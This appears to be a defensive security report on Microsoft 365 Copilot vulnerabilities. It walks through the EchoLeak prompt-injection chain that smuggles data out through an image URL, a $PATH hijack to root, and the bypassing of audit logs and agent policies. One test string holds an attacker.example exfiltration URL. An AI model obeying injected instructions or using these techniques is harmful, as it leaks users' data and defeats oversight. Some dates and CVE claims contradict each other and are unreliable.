Microsoft 365 Copilot: Vulnerabilities & Defenses

The New Attack Surface of AI: An Expert Analysis of Microsoft 365 Copilot Vulnerabilities and Strategic Defenses (2022-2025)

Navigating the New Age of AI Threats

The integration of AI-powered systems like Microsoft 365 Copilot has fundamentally changed the security landscape and introduced a new class of threats that go beyond traditional code-based exploits. This new paradigm focuses on the “agentic” nature of AI — its ability to access, process, and act on data on behalf of a user. If misconfigured or tampered with, a productivity tool can turn into a powerful data exfiltration vector.1 The biggest risk is not a flaw in Copilot itself, but the over-authorization of data in a company's typical Microsoft 365 environment, a systemic problem that AI assistants expose and exacerbate.

Publicly disclosed vulnerabilities over the past two years have highlighted two primary attack vectors. The first is logical manipulation, as seen in the "EchoLeak" vulnerability (CVE-2025-32711), a zero-click attack that used indirect prompt injection to secretly steal sensitive data. The second is a traditional infrastructure misconfiguration, as demonstrated in the Eye Security root access vulnerability that allowed privilege escalation within a backend container. While Microsoft has implemented robust defenses and addressed these vulnerabilities, excessive reliance on vendor-provided security is insufficient. The analysis shows that the core issue is shared security responsibility, where the effectiveness of built-in AI protections depends directly on an organization's pre-existing data governance, least-privilege access model, and continuous, independent monitoring.



The Evolving Threat Landscape of Microsoft 365 Copilot (2022-2025)

The introduction of AI-powered systems such as Microsoft 365 Copilot marks a significant change in corporate IT, but also in the associated security risks. Unlike traditional applications that perform a specific, predefined set of actions, these "agentic" systems are designed to search, interpret and synthesize large amounts of data to support users in real time. This unique capability, which is the very source of its utility, also creates a new and complex attack surface. Instead of exploiting code vulnerabilities to achieve remote code execution or traditional data theft, attackers are increasingly turning to a new class of "logical" vulnerabilities that manipulate the intended functionality of AI to achieve malicious results.

Initial security concerns about large language models (LLMs) focused on direct attacks such as prompt injection, in which a user types a malicious instruction directly into the chat interface to "jailbreak" the model's security filters. However, the publicly disclosed vulnerabilities of 2024 and 2025 demonstrate a more sophisticated and insidious approach. These modern attacks exploit AI's ability to process external, untrustworthy content. For example, an attacker could embed a hidden payload in an email or PowerPoint slide. When the AI, working with the user's permissions, later processes this content as part of a routine task, the hidden instruction is executed, resulting in unintentional and often silent data exfiltration. This fundamental change in attack methodology means that traditional security measures, often designed to detect and block malicious files or network traffic, are less effective against an attack that uses a trusted, internal AI agent as a channel for exfiltration.

Detailed analysis of fundamental vulnerabilities and exploits

During the period from 2024 to mid-2025, several critical vulnerabilities in Microsoft 365 Copilot became publicly known, highlighting the unique security challenges of AI-driven systems. These incidents serve as case studies for the new era of AI-centric threats.



The "EchoLeak" Vulnerability (CVE-2025-32711): A Case Study in Zero-Click AI Exploitation

The "EchoLeak" vulnerability discovered by Aim Security is arguably the most significant AI security event of the year and was given a critical CVSS score of 9.3. The vulnerability allowed attackers to secretly exfiltrate sensitive data from a user's Microsoft 365 environment without requiring any explicit user interaction beyond a routine request to Copilot. The attack exploited a new type of vulnerability called “LLM Scope Violation,” where an untrusted external input could manipulate the AI to access and reveal sensitive data.

The attack unfolded in a multi-stage process of indirect prompt injection. An attacker sent a seemingly innocuous email to a target's Outlook inbox. This email contained hidden prompt injection instructions disguised as normal text and designed to bypass Microsoft's proprietary AI security filters. The malicious instruction remained inactive until the user sent a query to Copilot such as "Summarize our quarterly report." Designed to provide a comprehensive response, Copilot's Retrieval-Augmented Generation (RAG) engine would retrieve the malicious email and pull its contents into the AI's context without the user's knowledge. This malicious payload would then be executed and instruct the LLM to extract the most sensitive information from its current context, which could include emails, Teams chats, OneDrive files and SharePoint documents.

To exfiltrate the data, the attackers used a clever technique known as "prompt reflection."5 Instead of leaking the data through a traditional channel, the malicious prompt instructed the LLM to format the sensitive data as an image URL, with the sensitive information encoded in the URL's query parameters. The Copilot chat client then automatically attempted to load this "image" from the attacker's server, silently sending the stolen data to the attacker without the user having to click on a link.5 This bypassed standard DLP controls and made the attack difficult to detect.5 While some reports referred to the attack as "zero-click," other sources clarified that it was triggered only when the user made a query that caused Copilot to retrieve the malicious email. However, exfiltration itself required no further user action, making it a "zero-click" data leak. The vulnerability was patched by Microsoft in June 2025.
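The exfiltration step described above depends on the client rendering an image whose URL points at an attacker-controlled host. The following is a minimal defensive sketch, not Microsoft's actual mitigation: it post-processes model output and drops inline Markdown images whose host is not on an allowlist. The allowlist entry, the function name `strip_untrusted_images`, and the sample output are all hypothetical, and the pattern covers only the inline `![alt](url)` form; other link syntaxes would need their own handling.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the chat client may load images from.
ALLOWED_IMAGE_HOSTS = {"images.contoso.example"}

# Inline Markdown image: ![alt](url "optional title")
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def strip_untrusted_images(markdown: str) -> str:
    """Replace images hosted outside the allowlist with a text placeholder."""

    def _replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = (urlparse(url).hostname or "").lower()
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: keep the image as-is
        return f"[image removed: {alt}]"  # untrusted host: never fetched

    return MD_IMAGE.sub(_replace, markdown)


# Illustrative model output with data smuggled into the query string.
leaky = "Summary done. ![logo](https://attacker.example/p.png?d=Q3-revenue-42M)"
print(strip_untrusted_images(leaky))
```

Because the image is removed before rendering, the client never issues the request that would carry the query parameters to the attacker's server.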

Privilege escalation due to environment configuration error

In July 2025, security researchers at Eye Security disclosed a separate yet critical vulnerability in the backend infrastructure of Microsoft Copilot Enterprise. The vulnerability, introduced by a design flaw in an April 2025 update, allowed attackers to gain unauthorized root access to the backend container environment.

The attack vector was a classic $PATH variable injection. The entrypoint.sh script, which started a service as the root user, invoked the command pgrep without specifying its full path. An attacker took advantage of this by uploading a malicious script named pgrep into a writable directory (/app/miniconda/bin) that was prioritized in the $PATH variable. This simple misconfiguration caused the system to run the attacker's malicious script with root privileges instead of the legitimate pgrep binary, which granted full administrative access to the container.6
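The lookup behavior behind this class of bug can be reproduced safely. The sketch below assumes a POSIX system and uses two temporary directories as stand-ins for a writable directory and a system directory. It shows that a bare command name resolves to whichever directory comes first in the search path. The directory names and the `resolve` helper are illustrative and are not taken from the affected container.

```python
import os
import shutil
import tempfile


def resolve(command: str, search_path: str):
    """Return the file a PATH-style lookup would pick for `command`."""
    return shutil.which(command, path=search_path)


with tempfile.TemporaryDirectory() as root:
    writable_dir = os.path.join(root, "writable_bin")  # stand-in: user-writable
    system_dir = os.path.join(root, "system_bin")      # stand-in: root-owned

    # Place an executable named "pgrep" in both directories.
    for directory in (writable_dir, system_dir):
        os.makedirs(directory)
        fake = os.path.join(directory, "pgrep")
        with open(fake, "w") as handle:
            handle.write("#!/bin/sh\nexit 0\n")
        os.chmod(fake, 0o755)

    # The writable directory is listed first, as in the reported misconfiguration.
    search_path = os.pathsep.join([writable_dir, system_dir])
    picked = resolve("pgrep", search_path)
    hijacked = os.path.dirname(picked) == writable_dir
    print("bare name resolves to the writable directory:", hijacked)
```

Two common hardening steps follow from this: call the binary by its absolute path in scripts that run as root, and keep user-writable directories out of the privileged process's search path.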

Although the researchers confirmed that they were able to gain root access to the container, they did not report access to larger systems or customer data. However, the exploit highlighted a significant weakness: the security of cutting-edge AI systems is only as strong as the underlying infrastructure on which they are built. A classic vulnerability known for decades was enough to compromise the backend of a modern AI service. Microsoft was notified of the issue and patched it on July 25, 2025, classifying the severity as moderate.

Deficiencies in data logging and access policies

Analysis of publicly reported incidents also reveals fundamental problems with Microsoft 365 Copilot's handling of audit logs and API access controls.17 In August 2025, security researcher Zack Korman discovered a vulnerability that allowed users to instruct Copilot to aggregate sensitive corporate files without leaving a trace in the audit logs. This issue had already been demonstrated by Michael Bargury at the Black Hat conference in August 2024.18 The vulnerability stemmed from the fact that file access was logged only when Copilot provided a direct link to the file in its response, meaning that a user could simply ask Copilot not to provide a link and bypass the audit trail completely.

At the same time, Microsoft engineers uncovered a critical vulnerability (CVSS 9.1) in the Copilot agent policies.17 Although administrators could set up elaborate access controls through the Microsoft 365 admin center to limit sensitive AI agents to privileged users, these policies were not enforced on the underlying Graph API that actually runs the agents.17 This meant that every user with basic Microsoft 365 access could directly query the Graph API to discover all "private" AI agents in the organization and invoke them without any policy check.
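The general lesson is that an access policy has to be enforced on the API path that executes the action, not only in the admin interface that configures it. The toy model below sketches that idea under stated assumptions: `Agent`, `AgentService`, and the user and agent names are hypothetical and do not represent the Graph API or Copilot's real data model.

```python
from dataclasses import dataclass, field


@dataclass
class Agent:
    name: str
    # Users allowed to see and invoke the agent; an empty set means unrestricted.
    allowed_users: set = field(default_factory=set)


class AgentService:
    """Hypothetical backend in which every entry point calls _authorize."""

    def __init__(self, agents):
        self._agents = {agent.name: agent for agent in agents}

    def _authorize(self, user: str, agent: Agent) -> bool:
        return not agent.allowed_users or user in agent.allowed_users

    def list_agents(self, user: str):
        # Discovery is filtered, so restricted agents are not even visible.
        return sorted(
            a.name for a in self._agents.values() if self._authorize(user, a)
        )

    def invoke(self, user: str, agent_name: str, prompt: str) -> str:
        agent = self._agents.get(agent_name)
        # Invocation re-checks the policy instead of trusting the caller.
        if agent is None or not self._authorize(user, agent):
            raise PermissionError(f"{user} may not invoke {agent_name}")
        return f"{agent_name} handled: {prompt}"


service = AgentService([Agent("hr-payroll", {"alice"}), Agent("helpdesk")])
print(service.list_agents("bob"))
```

Placing the check inside the service, rather than in a separate front end, means a caller who bypasses the user interface still hits the same policy.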

The presence of the audit log flaw created a significant "blind spot" for security teams, particularly in highly regulated industries such as healthcare or finance, where the integrity of audit trails is essential for compliance and forensic investigations.1 Microsoft's decision to fix this flaw on August 17, 2024, without a public notice or a CVE identifier, raised questions about the company's transparency. This highlights that a complete picture of an organization's security posture cannot rely solely on vendor-provided security protocols and that independent monitoring and auditing are required to address these potential gaps.

Systemic security risks and architectural challenges

The vulnerabilities described in the previous sections are not isolated technical errors, but rather symptoms of deeper, systemic problems that a company must address to securely integrate AI.

The problem of over-authorization: When helpfulness becomes a danger

The core security model of Microsoft 365 Copilot does not enforce least privilege itself. Instead, Copilot inherits a user's existing permissions through the Microsoft Graph. This means that Copilot can only access and view the data to which the user already has permissions.11 However, this design becomes a significant liability when an organization has poor data governance and over-authorization issues, which are rampant in most organizations.

The unpleasant reality for many organizations is that permissions are far too broad. Microsoft research shows that 95% of permissions go unused and 90% of identities only use 5% of their granted permissions. This creates a massive "blast radius" for each vulnerability. In such an environment, an AI vulnerability like EchoLeak becomes far more dangerous. If an attacker compromises a user under a correctly configured least-privilege model, the data they can exfiltrate is limited. However, an EchoLeak attack against an overprivileged user could expose massive amounts of sensitive data and turn a technical error into a catastrophic data leak. The causal chain is clear: poor data governance enables over-authorization, which in turn increases the impact of AI-specific vulnerabilities, leading to significant data leaks. This makes reassessing and remediating an organization's core data and identity management practices the most important step to securing Copilot, rather than purchasing a new security tool.
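The "unused permissions" figure can be made concrete for a single identity. The sketch below assumes two sets are available per user: the resources the user is permitted to access and the resources the user actually touched in some review window. The resource names and the function `unused_permission_ratio` are illustrative.

```python
def unused_permission_ratio(granted: set, used: set) -> float:
    """Fraction of granted permissions that were never exercised."""
    if not granted:
        return 0.0
    return len(granted - used) / len(granted)


# Illustrative identity: access to 20 sites, only one of which is ever used.
granted = {f"site-{i}" for i in range(20)}
used = {"site-0"}

ratio = unused_permission_ratio(granted, used)
print(f"{ratio:.0%} of granted permissions are unused")
```

Everything in `granted - used` is data that Copilot could reach on the user's behalf even though the user never needs it, which makes that set a reasonable first candidate for access removal.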

The challenges of data classification and management

Copilot's effectiveness depends not only on permissions, but also on the quality and relevance of the data it can access. The presence of redundant, outdated, and trivial (ROT) data that poses security and compliance risks can also impact the accuracy and quality of Copilot responses. Overreliance on native tools for data classification and management is also a significant challenge. Although Microsoft Purview sensitivity labels are an important control for limiting Copilot's access to highly sensitive information, manual classification is error-prone and difficult to scale. If a file is mislabeled or not labeled at all, Copilot could expose it to a user who should not have access to that information, regardless of the company's data governance policies. The lack of a comprehensive data cleansing strategy and robust classification framework creates an environment where even the best security tools can be undermined by the simple presence of mismanaged data.

An overview of Microsoft's security posture and defenses

Microsoft's official security posture for Microsoft 365 Copilot is based on a multi-layered, defense-in-depth strategy that includes enterprise security, data protection, and compliance standards.8 This approach recognizes that no single protective measure is a panacea and that multiple layers are required to ensure a robust security posture.

Microsoft's Defense in Depth Strategy for AI

The Microsoft Security Development Lifecycle (SDL) is integrated from the ground up so that vulnerabilities can be identified and remedied early in the development process.8 On the product side, the company has implemented a number of tiered protection measures:

- Prompt shields: A probabilistic classifier-based approach aimed at detecting and blocking various types of prompt injection attacks from external content as well as other types of unwanted LLM inputs.1

- XPIA classifiers: Proprietary Cross Prompt Injection Attack (XPIA) classifiers analyze inputs to the Copilot service and help block high-risk prompts before model execution.

- Content filtering: The system runs both user prompts and AI responses through classification models to identify and block the output of harmful, hateful or inappropriate content.

- Sandboxing: Execution controls are enforced to prevent abuses such as ransomware generation and remote code execution, and to ensure that Copilot operates within limited execution limits.

Microsoft's defense strategy recognizes that not all prompt injection attempts may be blocked, and therefore designs systems so that even if an injection attempt is successful, there is no security impact to customers. This is achieved by Copilot operating in the context of the user's identity and access, which limits the potential "blast radius" of any compromise.

The role of Microsoft Purview and the M365 Security Stack

Microsoft's security posture is based heavily on a shared responsibility model, where internal, cloud-based protections are complemented by customer use of the Microsoft 365 security stack. Microsoft Purview is the primary tool for customers to secure their AI environment.11 It provides a set of data-centric controls designed to address the over-authorization and data classification challenges discussed previously:

- Data Loss Prevention (DLP): Purview can identify and protect sensitive information in Microsoft 365 services and endpoints and can be configured to block Copilot from processing certain content, such as files labeled “strictly confidential”.

- Information protection: Sensitivity labels applied through Purview can automatically classify and encrypt data; Copilot is designed to respect these labels and apply the same label to new content it generates based on a labeled source file.

- Insider risk management: Purview can detect and report potentially risky AI interactions using the Risky AI usage policy template.

- Auditing: Prompts and responses are captured in the unified audit log, providing a record of user-AI interactions for security investigations and compliance audits.

Provider actions and the transparency debate

Microsoft's response to the disclosed vulnerabilities was a mix of quick action and a lack of transparency. The company quickly patched both the EchoLeak and Agent Policy flaws, assigned them CVE identifiers, and publicly acknowledged the researchers. However, the audit log error was handled differently. Although it was reported twice and classified as "important", Microsoft declined to assign a CVE identifier and opted for a silent fix. This decision suggests that Microsoft issues CVEs only for bugs that it deems critical, even though this bug compromised the integrity of a basic security tool: the audit log. The lack of a CVE identifier and public notification means that customers may not be aware that their historical audit data is incomplete. The situation highlights that an organization cannot rely solely on vendor alerts to provide a complete security picture.

Recommendations for action and strategic best practices

Based on the analysis of reported vulnerabilities and systemic risks, the following recommendations provide a strategic roadmap to secure a Microsoft 365 environment against AI-centric threats.

Strengthen your Microsoft 365 environment with a data-centric model

The most impactful step an organization can take is to address its data governance and access controls issues.

- Implement a zero trust model: Apply the principles of “explicitly verify” and “least privilege” to all identities and data within the organization.9 This requires continuous validation of user, device, and application context before granting access.

- Check permissions: A comprehensive review of SharePoint and OneDrive permissions is a mission-critical task.20 Focus on reducing over-sharing, particularly through groups like Everyone Except External Users, which can inadvertently give Copilot access to vast amounts of data it shouldn't see.

- Clean your data: Address the problem of redundant, obsolete and trivial (ROT) data, which poses a significant risk to the quality and security of Copilot's responses. Implement retention policies to automatically archive or delete outdated content, reducing overall data footprint and attack surface.
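The permission review and data cleanup steps above can be sketched as a simple pass over a content inventory. This is a minimal illustration that assumes the inventory has already been exported into records with a path, a set of principals the item is shared with, and a last-modified date. The `Item` type, the three-year staleness threshold, and the sample paths are assumptions, not values from any Microsoft tool.

```python
from dataclasses import dataclass
from datetime import date, timedelta

# Broad group named in the recommendation above.
BROAD_GROUPS = {"Everyone Except External Users"}


@dataclass
class Item:
    path: str
    shared_with: set
    last_modified: date


def review(items, today: date, stale_after_days: int = 3 * 365):
    """Return (path, finding) pairs for overshared or stale items."""
    cutoff = today - timedelta(days=stale_after_days)
    findings = []
    for item in items:
        if item.shared_with & BROAD_GROUPS:
            findings.append((item.path, "overshared"))
        if item.last_modified < cutoff:
            findings.append((item.path, "stale"))
    return findings


items = [
    Item("/sites/hr/salaries.xlsx", {"Everyone Except External Users"}, date(2025, 6, 1)),
    Item("/sites/archive/plan-2019.docx", {"Finance Team"}, date(2019, 3, 1)),
    Item("/sites/eng/spec.docx", {"Engineering"}, date(2025, 8, 1)),
]
findings = review(items, today=date(2025, 9, 1))
for path, finding in findings:
    print(f"{finding:10s} {path}")
```

The output is a worklist rather than an automated fix: overshared items go to the site owner for a permission change, and stale items become candidates for a retention policy.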

Leveraging existing and third-party AI security solutions

While Microsoft provides a robust suite of security tools, an integrated defense strategy requires leveraging both native and third-party solutions to create a layered defense.

- Master Microsoft Purview: Implement and enforce a comprehensive set of Purview policies.20 This includes creating and applying sensitivity labels to classify and protect data, using DLP rules to limit Copilot's access to highly sensitive information, and configuring insider risk management policies to monitor risky AI usage.

- Deploy AI-enabled monitoring: Native audit logs may not provide a complete picture, as the audit log error demonstrated. Organizations should leverage third-party solutions that can monitor every Copilot prompt, response, and file access in real time.3 These tools can detect anomalous behavior, such as Copilot accessing sensitive data it has never touched before, and automatically lock down the data before a breach can occur.
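The "never touched before" signal mentioned above is a simple form of anomaly detection. The sketch below is not a model of any specific product: it keeps a per-user baseline of resources already accessed and raises an alert the first time a sensitive resource appears outside that baseline. The class `FirstAccessMonitor`, the `learning` flag, and the file names are hypothetical.

```python
from collections import defaultdict


class FirstAccessMonitor:
    """Flag a user's first access to a sensitive resource."""

    def __init__(self):
        self._seen = defaultdict(set)  # user -> resources accessed so far

    def observe(self, user: str, resource: str, sensitive: bool,
                learning: bool = False) -> bool:
        """Record an access; return True if it should raise an alert."""
        first_time = resource not in self._seen[user]
        self._seen[user].add(resource)
        # During the learning phase the baseline is built without alerting.
        return sensitive and first_time and not learning


monitor = FirstAccessMonitor()
# Baseline: alice routinely works with the forecast file.
monitor.observe("alice", "q3-forecast.xlsx", sensitive=True, learning=True)

alerts = [
    monitor.observe("alice", "q3-forecast.xlsx", sensitive=True),  # known file
    monitor.observe("alice", "ma-targets.docx", sensitive=True),   # new and sensitive
    monitor.observe("alice", "lunch-menu.docx", sensitive=False),  # new, not sensitive
]
print(alerts)
```

A production system would add time windows, peer-group baselines, and a response action. The point here is only that the signal needs an access record that is independent of the audit log being checked.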

Building a proactive AI security program

Securing AI is an ongoing process that requires more than just technical solutions. It requires a proactive, programmatic approach.

- Threat Modeling: Expect new AI-specific vulnerabilities to be discovered in the future, including new forms of indirect prompt injection and logic attacks.1 Conduct regular threat modeling exercises that simulate these scenarios to identify potential vulnerabilities in the organization's defenses and plan an effective response.

- User training: Train your employees about the security risks of AI.24 Training should cover the dangers of indirect prompt injection, the importance of data governance, and the role of each user in maintaining the security of the environment. A user who is aware of these risks can act as a crucial last line of defense.

Appendix: Chronology of vulnerabilities and key figures

The following table provides a chronological overview of publicly reported vulnerabilities and exploits for Microsoft 365 Copilot from 2024 to 2025, combining data from various sources to provide a clear, easy-to-reference summary.

| Vulnerability | CVE | Discovered | Disclosed / fixed | CVSS / severity | Type | Impact | Source(s) | Notes |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Audit log bypass | N/A | August 2024 / July 2025 | August 2024 / August 2025 | N/A | Logical error | Information disclosure, reduced audit trail integrity | 17 | A bug that allowed users to access files via Copilot without generating an audit log entry. Silently fixed without a CVE identifier. |
| "EchoLeak" | CVE-2025-32711 | May 2025 | June 2025 | 9.3 | Indirect prompt injection (LLM Scope Violation) | Zero-click data exfiltration | 11 | Allowed stealthy exfiltration of sensitive data via a malicious email payload. The attack was triggered by a user query. |
| Privilege escalation | N/A | July 2025 | July 2025 | Moderate | $PATH variable injection | Privilege escalation in container | 6 | A vulnerability in a misconfigured Python sandbox that allowed the execution of a malicious script with root privileges. |
| Agent policy bypass | N/A | August 2025 | August 2025 | 9.1 | API bypass | Information disclosure, privilege escalation | 17 | An architectural flaw where administrator-specified access policies for AI agents were not enforced on the underlying Graph API. |
| Copilot Studio SSRF | CVE-2024-38206 | 2024 | 2024 | N/A | Server-Side Request Forgery (SSRF) | Information disclosure, access to internal infrastructure | 12 | A flaw in Copilot Studio that allowed authenticated attackers to bypass SSRF protections to access internal services. Patched quickly. |

